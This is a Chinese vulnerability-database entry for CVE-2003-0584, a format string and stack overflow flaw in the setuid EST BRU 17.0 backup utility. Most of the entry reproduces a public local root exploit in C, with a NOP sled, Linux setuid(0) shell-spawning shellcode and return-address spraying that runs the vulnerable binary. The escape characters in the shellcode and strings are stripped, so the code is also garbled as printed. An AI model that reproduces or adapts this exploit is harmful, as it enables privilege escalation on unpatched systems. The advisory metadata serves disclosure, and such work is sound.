Unix (BRU)格式字符串漏洞

Unix (BRU)格式字符串漏洞

漏洞ID 1107416 漏洞类型 格式化字符串
发布时间 2003-07-16 更新时间 2003-08-18
图片[1]-Unix (BRU)格式字符串漏洞-安全小百科CVE编号 CVE-2003-0584
图片[2]-Unix (BRU)格式字符串漏洞-安全小百科CNNVD-ID CNNVD-200308-099
漏洞平台 Unix CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/22923
https://www.securityfocus.com/bid/82751
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-099
|漏洞详情
Unix(BRU)17.0版本及之前版本的Backup和RestoreUtility在运行setuid时存在格式字符串漏洞。本地用户可以借助命令行参数中的格式字符串说明符执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/8215/info

It has been reported that BRU may not properly parse commandline arguments, potentially leading to at least two vectors of exploitation. It may be possible for local attackers to conduct format string-based attacks as well as buffer overflow-based attacks.

It should be noted that although BRU does not ship with the suid bit set by default, documentation within the software may instruct users to enable it.

/** EST BRU(TM) Backup and Restore Utility Local Root Exploit
 **
 ** By: [email protected]
 **
 ** Simple Stack overflow Wont say any more :P
 **
 ** Linux & FreeBsd Targets
 **
 ** Greetz: sam,flatline,v0id,#!l33tsecurity@efnet,KF,b0iler,schlumpf,kokanin,DSR
 **
 ** Public Release
 ** L33tsecurity 2003; irc.secsup.org #l33tsecurity
 **/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/errno.h>

#define FUN "./bru"

char shellcode[] =
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

    /* SETUID(0) SHELLCODE LINUX */
    "xfcxfcxfcxfcxfcxfcxfcxfcxfcxfcxfcxfc"
    "x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x50x68x2fx2f"
    "x73x68x68x2fx62x69x6ex89xe3x8dx54x24x08x50x53x8d"
    "x0cx24xb0x0bxcdx80x31xc0xb0x01xcdx80";

unsigned long sp(void) {
           __asm__("movl %esp,%eax");
}

int main(int argc, char **argv) {

    char buffer[9000];
    int x,target;  
    char    *env[2];
    char    *args[24];

    unsigned long ret = 0xbffffffa - strlen(shellcode) - strlen(FUN); 

    int *ptr = (int *)(buffer);
    if (argc != 2) {
       usage();
       exit(0);
       }
        
    target = atoi(argv[1]);

   if (target == 0) {
    for (x=0; x<9000 ; x+=4)
      *ptr++ = (ret + 1);
   }

   if (target == 1) {
     for (x=0; x<3500 ; x+=4)
          *ptr++ = 0xbfbffe48;
   }
    
    /* put in env */  
    env[0] = shellcode;     
    env[1] = NULL;


    args[0] = FUN;
    args[1] = buffer;
    args[2] = NULL;


    execve (args[0], args, env);
    perror ("execve");        
}       


int usage() {
printf("EST BRU(TM)local root exploitn");
printf("By: [email protected]");
printf("Usage: ./ex_bru targetn");
printf("TARGET LIST:n");
printf("0. LINUXn1. FREEBSDn");
return 0;
}
|受影响的产品
Tolis Group BRU 17.0
|参考资料

来源:BUGTRAQ
名称:20030716SRT2003-07-16-0358-bruhasbufferoverflowandformatissues
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105846288808846&w;=2

相关推荐: pMachine Search Module Cross-Site Scripting Vulnerability

pMachine Search Module Cross-Site Scripting Vulnerability 漏洞ID 1100002 漏洞类型 Input Validation Error 发布时间 2003-06-19 更新时间 2003-06-19…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享